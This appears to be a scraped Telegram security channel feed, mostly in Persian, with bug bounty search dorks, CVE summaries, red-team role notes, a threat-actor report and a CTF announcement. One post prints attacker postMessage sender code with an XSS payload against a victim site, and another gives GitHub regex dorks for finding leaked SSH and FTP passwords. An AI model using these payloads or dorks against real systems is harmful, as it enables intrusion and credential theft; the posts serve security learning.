BugBounty Program Google Dorks (part1):
⭐️ @ZeroSec_team
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
responsible disclosure hall of fame
inurl:responsible disclosure $50
responsible disclosure europe
responsible disclosure white hat
white hat program
insite:"responsible disclosure" -inurl:nl
intext responsible disclosure
site eu responsible disclosure
site .nl responsible disclosure
site responsible disclosure
responsible disclosure:sites
responsible disclosure r=h:nl
responsible disclosure r=h:uk
responsible disclosure r=h:eu
responsible disclosure bounty r=h:nl
responsible disclosure bounty r=h:uk
responsible disclosure bounty r=h:eu
responsible disclosure swag r=h:nl
responsible disclosure swag r=h:uk
responsible disclosure swag r=h:eu
responsible disclosure reward r=h:nl
responsible disclosure reward r=h:uk
responsible disclosure reward r=h:eu
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
site:*.gov.* "responsible disclosure"
intext:"we take security very seriously"
site:responsibledisclosure.com
inurl:'vulnerability-disclosure-policy' reward
intext:Vulnerability Disclosure site:nl
intext:Vulnerability Disclosure site:eu
site:*.*.nl intext:security report reward
site:*.*.nl intext:responsible disclosure reward
"security vulnerability" "report"
inurl"security report"
"responsible disclosure" university
inurl:/responsible-disclosure/ university
buy bitcoins "bug bounty"
⭐️ @ZeroSec_team
🔥4
BugBounty Program Google Dorks (part2):
⭐️ @ZeroSec_team
inurl:/security ext:txt "contact"
"powered by synack"
intext:responsible disclosure bounty
inurl: private bugbountyprogram
inurl:/.well-known/security ext:txt
inurl:/.well-known/security ext:txt intext:hackerone
inurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbounty
inurl:reporting-security-issues
inurl:security-policy.txt ext:txt
site:*.*.* inurl:bug inurl:bounty
site:help.*.* inurl:bounty
site:support.*.* intext:security report reward
intext:security report monetary inurl:security
intext:security report reward inurl:report
site:security.*.* inurl: bounty
site:*.*.de inurl:bug inurl:bounty
site:*.*.uk intext:security report reward
site:*.*.cn intext:security report reward
"vulnerability reporting policy"
"van de melding met een minimum van een" -site:responsibledisclosure.nl
inurl:responsible-disclosure-policy
"If you believe you've found a security vulnerability"
intext:"BugBounty" and intext:"BTC" and intext:"reward"
intext:bounty inurl:/security
inurl:"bug bounty" and intext:"€" and inurl:/security
inurl:"bug bounty" and intext:"$" and inurl:/security
inurl:"bug bounty" and intext:"INR" and inurl:/security
inurl:/security.txt "mailto*" -github.com -wikipedia.org -portswigger.net -magento
/trust/report-a-vulnerability
site:*.edu intext:security report vulnerability
"cms" bug bounty
"If you find a security issue" "reward"
"responsible disclosure" intext:"you may be eligible for monetary compensation"
inurl: "responsible disclosure", "bug bounty", "bugbounty"
intext: we offer a bounty
responsible disclosure inurl:in
site:*.br responsible disclosure
site:*.at responsible disclosure
site:*.be responsible disclosure
site:*.au responsible disclosure
site:*/security.txt "bounty"
inurl:bug bounty intext:"rupees"
inurl:bug bounty intext:"₹"
inurl:responsible disclosure intext:"INR"
"vulnerability disclosure program" AND (bounty OR reward OR swag OR "hall of fame")
"responsible disclosure" AND (monetary OR cash OR "gift card" OR crypto OR BTC)
"security@*" AND ("bug bounty" OR "vulnerability disclosure") ext:txt
"powered by yeswehack" OR "powered by federacy" OR "powered by intigriti" -site:yeswehack.com -site:federacy.com -site:intigriti.com
"submit vulnerability report" -site:hackerone.com -site:bugcrowd.com -site:synack.com -site:openbugbounty.org
inurl:/.well-known/security.txt intext:bounty -hackerone -bugcrowd -synack
⭐️ @ZeroSec_team
🔥5❤1
Forwarded from HuntLearn
🔔 استخدام کارشناس ارشد تست نفوذ اپلیکیشن
💰 حقوق: +۵۰ میلیون تومان
📍 محل همکاری: حضوری – تهران
بهصورت فوری بهدنبال جذب ۲ کارشناس تستنفوذ (میدل یا سینیور) هستیم.
🔑 شرایط و مهارتها:
تسلط کامل به تست نفوذ وباپلیکیشن
مسلط یا علاقهمند به تست نفوذ موبایل
توانایی کار تیمی و مسئولیتپذیری
🎯 اولویت با دانشجویان و فارغالتحصیلان «هانتلرن» خواهد بود.
💼 همکاری با شرایط عالی و حقوق رقابتی.
📩 برای ارسال رزومه اقدام بفرمایید:
@huntlearn_support
💰 حقوق: +۵۰ میلیون تومان
📍 محل همکاری: حضوری – تهران
بهصورت فوری بهدنبال جذب ۲ کارشناس تستنفوذ (میدل یا سینیور) هستیم.
🔑 شرایط و مهارتها:
تسلط کامل به تست نفوذ وباپلیکیشن
مسلط یا علاقهمند به تست نفوذ موبایل
توانایی کار تیمی و مسئولیتپذیری
🎯 اولویت با دانشجویان و فارغالتحصیلان «هانتلرن» خواهد بود.
💼 همکاری با شرایط عالی و حقوق رقابتی.
📩 برای ارسال رزومه اقدام بفرمایید:
@huntlearn_support
❤5
Adversarial_AI_Attacks.pdf
9.6 MB
#MLSecOps
#Tech_book
"Adversarial AI Attacks, Mitigations, and Defense Strategies: A cybersecurity professional’s guide to AI attacks, threat modeling, and securing AI with MLSecOps', 2024.
// The book is for cybersecurity professionals, such as security architects, analysts, engineers, ethical hackers, pentesters, and incident responders, but also developers and engineers designing, building, and assuring AI systems
⭐️ @Zerosec_team
#Tech_book
"Adversarial AI Attacks, Mitigations, and Defense Strategies: A cybersecurity professional’s guide to AI attacks, threat modeling, and securing AI with MLSecOps', 2024.
// The book is for cybersecurity professionals, such as security architects, analysts, engineers, ethical hackers, pentesters, and incident responders, but also developers and engineers designing, building, and assuring AI systems
⭐️ @Zerosec_team
❤2🔥1
Forwarded from GO-TO CVE (| | Sharo K h | |)
سرویس اوپن سورس formbricks یه cve خورده
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors
حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه
https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4
#CVE-2025-59934
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors
حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه
export const verifyToken = async (token: string): Promise<JwtPayload> => {
// First decode to get the ID
const decoded = jwt.decode(token);
const payload: JwtPayload = decoded as JwtPayload;
https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4
#CVE-2025-59934
GitHub
Missing JWT signature verification in formbricks
### **Denoscription**
---
**Vulnerability Overview**
This vulnerability stems from a token validation routine that only decodes JWTs (jwt.decode) without verifying their signatures. Both ...
---
**Vulnerability Overview**
This vulnerability stems from a token validation routine that only decodes JWTs (jwt.decode) without verifying their signatures. Both ...
❤5
https://cybersecuritynews.com/whatsapp-0-click-vulnerability-exploited/
از اسلاگش مشخصه درمورد چیه
⭐️ @ZeroSec_team
از اسلاگش مشخصه درمورد چیه
⭐️ @ZeroSec_team
Cyber Security News
WhatsApp 0-Click Vulnerability Exploited Using Malicious DNG File
WhatsApp 0-click remote code execution (RCE) vulnerability affecting Apple's iOS, macOS, and iPadOS platforms, detailed with a proof of concept demonstration.
❤3
Forwarded from Bugbountyhints
امروز داشتم یه ریپورتی در رابطه با postMessage میخوندم که دوست داشتم که اینجا بازش کنم :
ما یه همچین listener ای رو داریم :
خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
ما یه همچین listener ای رو داریم :
Receiver: function (e) {
var n, r = this.get("replaceRoute"), i = this.get("referrer");
if (!i || e.origin === normalize(i)) {
try { n = JSON.parse(e.data); } catch (u) {}
// ...
}
}خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
win = window.open("https://transact.victim.com/");
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "application_error",
model: { error: 500, noscript: "injected", message: "from attacker" }
}), "*");حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "voucher.multi-product-details",
model: {
eligible: true,
sku: {
id: 0, longDenoscription: `
<img src=x onerror='alert(document.domain)'>`
}
}
}), "*");❤7🤣2
⚠️ 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗶𝗻 𝗗𝗷𝗮𝗻𝗴𝗼 𝗙𝗿𝗮𝗺𝗲𝘄𝗼𝗿𝗸
The Django library has announced a very critical vulnerability (CVE-2025-57833) that allows attackers to perform SQL Injection on servers using the framework
🔍 𝗪𝗵𝗮𝘁 𝗵𝗮𝗽𝗽𝗲𝗻𝗲𝗱?
• The flaw is in the FilteredRelation component inside the ORM.
• An attacker can exploit it by passing a specially crafted dictionary to QuerySet.annotate() or QuerySet.alias().
• Result: SQL Injection = ability to manipulate queries, access sensitive data, or even take full control of the server.
⚠️ 𝗔𝗳𝗳𝗲𝗰𝘁𝗲𝗱 𝘃𝗲𝗿𝘀𝗶𝗼𝗻𝘀:
• Django 5.2
• Django 5.1
• Django 4.2 (LTS)
• And also the main development branch.
🛡️ 𝗪𝗵𝗮𝘁’𝘀 𝘁𝗵𝗲 𝘀𝗼𝗹𝘂𝘁𝗶𝗼𝗻?
Immediate update required to:
• Django 5.2.6
• Django 5.1.12
• Django 4.2.24
-
#CyberSecurity
#Django
#SQLInjection
#CVE2025
⭐️ @ZeroSec_team
The Django library has announced a very critical vulnerability (CVE-2025-57833) that allows attackers to perform SQL Injection on servers using the framework
🔍 𝗪𝗵𝗮𝘁 𝗵𝗮𝗽𝗽𝗲𝗻𝗲𝗱?
• The flaw is in the FilteredRelation component inside the ORM.
• An attacker can exploit it by passing a specially crafted dictionary to QuerySet.annotate() or QuerySet.alias().
• Result: SQL Injection = ability to manipulate queries, access sensitive data, or even take full control of the server.
⚠️ 𝗔𝗳𝗳𝗲𝗰𝘁𝗲𝗱 𝘃𝗲𝗿𝘀𝗶𝗼𝗻𝘀:
• Django 5.2
• Django 5.1
• Django 4.2 (LTS)
• And also the main development branch.
🛡️ 𝗪𝗵𝗮𝘁’𝘀 𝘁𝗵𝗲 𝘀𝗼𝗹𝘂𝘁𝗶𝗼𝗻?
Immediate update required to:
• Django 5.2.6
• Django 5.1.12
• Django 4.2.24
-
#CyberSecurity
#Django
#SQLInjection
#CVE2025
⭐️ @ZeroSec_team
👍5❤3
نقش ها و مسئولیت ها در Red Team Engagement
برای اجرای درست یه تست Red Team فقط داشتن تیم حمله کافی نیست.
باید نقش ها و مسئولیت های مختلف به درستی تعریف و انتخاب بشن این کار معمولاً توسط مدیریت سازمان (CISO/CIO) و Engagement Control Group (ECG) انجام میشه.
Red Team :
Red Team Lead مسئول کل عملیات، هماهنگی با ECG/White Cell، تهیه گزارش نهایی
Red Team Operators اجراکنندهی حملات
Blue Team :
تیم دفاع سازمان (SOC/IT Security) که ممکنه مطلع باشند یا نباشند (Announced ,Unannounced)
White Cell :
نقش ناظر و یا داور که وظیفه اجرای ROE و همبستگی برای جلوگیری از آسیب واقعی کند (بدون کمک به Blue Team)
Engagement Control Group (ECG) :
تیم تصمیم گیرنده اعضا مدیران ارشد (CIO,CISO,COO) یک نماینده IT , نماینده White Cell , نماینده RedTeam وظیفه تصویب اهداف دامنه تایم لاین قوانین و تصمیم گیری درمورد اطلاع رسانی operation به BlueTeam و انتخاب TA ها
Trusted Agent (TA) :
فرد مورد اعتماد داخل سازمان که وظیفه جلوگیری از آسیب جدی به داده / زیرساخت و کارکنان را دارد اطلاعات محرمانه دارد ولی نباید چیزی به Blue Team بده مگر با تایید ECG
Observers :
فقط برای مستند سازی هیچ دخالتی در عملیات ندارند
⭐️ @ZeroSec_team
برای اجرای درست یه تست Red Team فقط داشتن تیم حمله کافی نیست.
باید نقش ها و مسئولیت های مختلف به درستی تعریف و انتخاب بشن این کار معمولاً توسط مدیریت سازمان (CISO/CIO) و Engagement Control Group (ECG) انجام میشه.
Red Team :
Red Team Lead مسئول کل عملیات، هماهنگی با ECG/White Cell، تهیه گزارش نهایی
Red Team Operators اجراکنندهی حملات
Blue Team :
تیم دفاع سازمان (SOC/IT Security) که ممکنه مطلع باشند یا نباشند (Announced ,Unannounced)
White Cell :
نقش ناظر و یا داور که وظیفه اجرای ROE و همبستگی برای جلوگیری از آسیب واقعی کند (بدون کمک به Blue Team)
Engagement Control Group (ECG) :
تیم تصمیم گیرنده اعضا مدیران ارشد (CIO,CISO,COO) یک نماینده IT , نماینده White Cell , نماینده RedTeam وظیفه تصویب اهداف دامنه تایم لاین قوانین و تصمیم گیری درمورد اطلاع رسانی operation به BlueTeam و انتخاب TA ها
Trusted Agent (TA) :
فرد مورد اعتماد داخل سازمان که وظیفه جلوگیری از آسیب جدی به داده / زیرساخت و کارکنان را دارد اطلاعات محرمانه دارد ولی نباید چیزی به Blue Team بده مگر با تایید ECG
Observers :
فقط برای مستند سازی هیچ دخالتی در عملیات ندارند
⭐️ @ZeroSec_team
❤4👍2👏1
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!
Eg, find SSH and FTP passwords via connection strings with:
⭐️ @ZeroSec_team
Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/ ⭐️ @ZeroSec_team
❤4🔥2👏1
Forwarded from PentesterLand Academy - Public
اگه دوس داشتید دنبال کنندگان شما هم جزیی از این چالش باشند میتونید این پست رو به انتشار بزارید❤️🙏🏼
https://www.instagram.com/p/DPQrtnjjUS8/?igsh=MW9zejR5M2t3bGNyaw==
https://www.instagram.com/p/DPQrtnjjUS8/?igsh=MW9zejR5M2t3bGNyaw==
👌2❤🔥1
Hacking smarter with Burp AI: NahamSec puts Burp AI to the test
https://portswigger.net/blog/hacking-smarter-with-burp-ai-nahamsec-puts-burp-ai-to-the-test
⭐️ @ZeroSec_team
https://portswigger.net/blog/hacking-smarter-with-burp-ai-nahamsec-puts-burp-ai-to-the-test
⭐️ @ZeroSec_team
PortSwigger Blog
Hacking smarter with Burp AI: NahamSec puts Burp AI to the test
Bug bounty legend, NahamSec, has taken Burp AI for a spin. If you're curious how Burp AI fits into a real workflow, his new video is the perfect place to start. Watch on YouTube Burp AI was built to a
❤4👍1
🔴 خلاصهای از 10 سال اخیر ایران ؛
تحریم
کرونا
دلار
طلا
جنگ
مکانیسم ماشه
آب
برق
زلزله
سیل
خشکسالی
اسکم های Bugcrowd
🔁این لیست آپدیت میشه
تحریم
کرونا
دلار
طلا
جنگ
مکانیسم ماشه
آب
برق
زلزله
سیل
خشکسالی
اسکم های Bugcrowd
🔁این لیست آپدیت میشه
🤣20💔5❤1
Forwarded from HackMeLocal
🕹 مینیچالش روی وردپرس!
همیشه لازم نیست از راه سخت دسترسی بگیریم!
بیشتر حملههایی که صورت میگیره از یک دسترسی ساده شروع میشه که به خاطر یک اشتباه کوچیک اطلاعات اون دسترسی لو رفته. ( شب دارکی شد ... )
برای نشون دادن اهمیت این چالش طراحی شده ( لازم بگم با تغییرات جزئی مثل همین باگ روی یک پلتفرم باگ بانتی گزارش شده که بعد از کشف حتما داخل کانال توضیح میدیم ):
ما بروزترین نسخه وردپرس نصب کردیم، سپس یک WAF سر راه اون قرار دادیم اما در یک اقدامی عجیب بدون حتی یک خطا یک هکر وارد وبسایت ما شد.
⚠️ این حمله تقریبا چند دقیقه بعد از اینکه اولین ویدیو داخل وبسایت آپلود شد صورت گرفت نکته عجیب اینکه ما حتی این ویدیو را در پستهایمان استفاده نکردیم !!
🔗آدرس وبسایت ما:
https://wp1.hackmelocal.com
#BugBounty #Wordpress #Vulnrability #CTF #HackMeLocal #InformationLeak
@HackMeLocal
همیشه لازم نیست از راه سخت دسترسی بگیریم!
بیشتر حملههایی که صورت میگیره از یک دسترسی ساده شروع میشه که به خاطر یک اشتباه کوچیک اطلاعات اون دسترسی لو رفته. ( شب دارکی شد ... )
برای نشون دادن اهمیت این چالش طراحی شده ( لازم بگم با تغییرات جزئی مثل همین باگ روی یک پلتفرم باگ بانتی گزارش شده که بعد از کشف حتما داخل کانال توضیح میدیم ):
ما بروزترین نسخه وردپرس نصب کردیم، سپس یک WAF سر راه اون قرار دادیم اما در یک اقدامی عجیب بدون حتی یک خطا یک هکر وارد وبسایت ما شد.
⚠️ این حمله تقریبا چند دقیقه بعد از اینکه اولین ویدیو داخل وبسایت آپلود شد صورت گرفت نکته عجیب اینکه ما حتی این ویدیو را در پستهایمان استفاده نکردیم !!
🔗آدرس وبسایت ما:
https://wp1.hackmelocal.com
#BugBounty #Wordpress #Vulnrability #CTF #HackMeLocal #InformationLeak
@HackMeLocal
❤3
🔹 یه گروه هکری به اسم Nimbus Manticore که میگن به ایران وصله، شروع کرده به زدن شرکتهای اروپایی (دفاعی، مخابراتی، هوافضا).
🔹 با ایمیلهای فیشینگ (مثلاً آگهی استخدام جعلی) آدمارو گول میزنن، بعد بدافزار میریزن.
🔹 دو تا ابزار اصلی دارن:
MiniJunk → بکدور برای کنترل سیستم قربانی
MiniBrowse → دزدی اطلاعات کاربری/مرورگر
🔹 برای مخفی شدن هم از کد پیچیده و گواهی دیجیتال جعلی استفاده میکنن.
ابزارهای اصلیای که به کار میبرن:
• MiniJunk — یک backdoor پنهان که به هکرها اجازه میده کنترل دستگاه قربانی رو بگیرن، فایل آپلود یا دانلود کنن و کارای دیگه
• MiniBrowse — یه ابزار سبک برای دزدی اطلاعات کاربری (مثل اطلاعاتی که توی مرورگرها ذخیره شده)
برای پنهان شدن بیشتر، از روشهای «ابهامزایی» (obfuscation) استفاده میکنن؛ یعنی کدها رو طوری مینویسن که تحلیلش برامون سخت باشه. همچنین از گواهیهای دیجیتال جعلشده استفاده شده برای اینکه بدافزار دیده نشه یا مشکوک نباشه.
این گروه قبلاً هم تحت نام UNC1549 شناسایی شده بوده و ارتباطاتی با سپاه پاسداران انقلاب اسلامی ایران داره.
⭐️ @ZeroSec_team
🔹 با ایمیلهای فیشینگ (مثلاً آگهی استخدام جعلی) آدمارو گول میزنن، بعد بدافزار میریزن.
🔹 دو تا ابزار اصلی دارن:
MiniJunk → بکدور برای کنترل سیستم قربانی
MiniBrowse → دزدی اطلاعات کاربری/مرورگر
🔹 برای مخفی شدن هم از کد پیچیده و گواهی دیجیتال جعلی استفاده میکنن.
ابزارهای اصلیای که به کار میبرن:
• MiniJunk — یک backdoor پنهان که به هکرها اجازه میده کنترل دستگاه قربانی رو بگیرن، فایل آپلود یا دانلود کنن و کارای دیگه
• MiniBrowse — یه ابزار سبک برای دزدی اطلاعات کاربری (مثل اطلاعاتی که توی مرورگرها ذخیره شده)
برای پنهان شدن بیشتر، از روشهای «ابهامزایی» (obfuscation) استفاده میکنن؛ یعنی کدها رو طوری مینویسن که تحلیلش برامون سخت باشه. همچنین از گواهیهای دیجیتال جعلشده استفاده شده برای اینکه بدافزار دیده نشه یا مشکوک نباشه.
این گروه قبلاً هم تحت نام UNC1549 شناسایی شده بوده و ارتباطاتی با سپاه پاسداران انقلاب اسلامی ایران داره.
⭐️ @ZeroSec_team
🔥6❤3
یه باگ خیلی خفن تو Red Hat OpenShift AI پیدا شده، اسمش هم CVE-2025-10725
داستانش اینه که یکی از رولها (ClusterRoleBinding) خیلی باز تنظیم شده بوده، یعنی هرکی لاگین کنه (هر کاربر سادهی اوپنشیفت) میتونه بره خودشو قاطی مدیرای کل سیستم (cluster-admin) کنه! 😳
یعنی تو عمل:
یکی اگه یه یوزر عادی هم داشته باشه، میتونه با یه سری درخواست API کارای خطرناک بکنه → پاد بسازه، جاب بزنه، بعدش یواش یواش کنترل کل کلاستر رو بگیره.
📌 نکات مهم:
امتیاز CVSS: ۹.۹ → فوقالعاده بحرانی.
شرط لازم: باید قبلاً لاگین کرده باشی (یه یوزر یا توکن لو رفته باشه).
نتیجه: اگه اکسپلویت بشه، دیگه فاتحهی کل سیستم AI و دیتاهایی که روشه خوندهست.
✅ راهحل:
سریع آپدیت کنی (پچ جدید داده شده).
اون رول اشتباه (kueue-batch-user-role روی گروه system:authenticated) رو حذف کنی.
مجوز ساخت job/pod فقط دست کاربرای قابل اعتماد باشه.
لاگها رو چک کنی که کسی مشکوک دستکاری نکرده باشه.
⭐️ @ZeroSec_team
داستانش اینه که یکی از رولها (ClusterRoleBinding) خیلی باز تنظیم شده بوده، یعنی هرکی لاگین کنه (هر کاربر سادهی اوپنشیفت) میتونه بره خودشو قاطی مدیرای کل سیستم (cluster-admin) کنه! 😳
یعنی تو عمل:
یکی اگه یه یوزر عادی هم داشته باشه، میتونه با یه سری درخواست API کارای خطرناک بکنه → پاد بسازه، جاب بزنه، بعدش یواش یواش کنترل کل کلاستر رو بگیره.
📌 نکات مهم:
امتیاز CVSS: ۹.۹ → فوقالعاده بحرانی.
شرط لازم: باید قبلاً لاگین کرده باشی (یه یوزر یا توکن لو رفته باشه).
نتیجه: اگه اکسپلویت بشه، دیگه فاتحهی کل سیستم AI و دیتاهایی که روشه خوندهست.
✅ راهحل:
سریع آپدیت کنی (پچ جدید داده شده).
اون رول اشتباه (kueue-batch-user-role روی گروه system:authenticated) رو حذف کنی.
مجوز ساخت job/pod فقط دست کاربرای قابل اعتماد باشه.
لاگها رو چک کنی که کسی مشکوک دستکاری نکرده باشه.
⭐️ @ZeroSec_team
🔥8❤1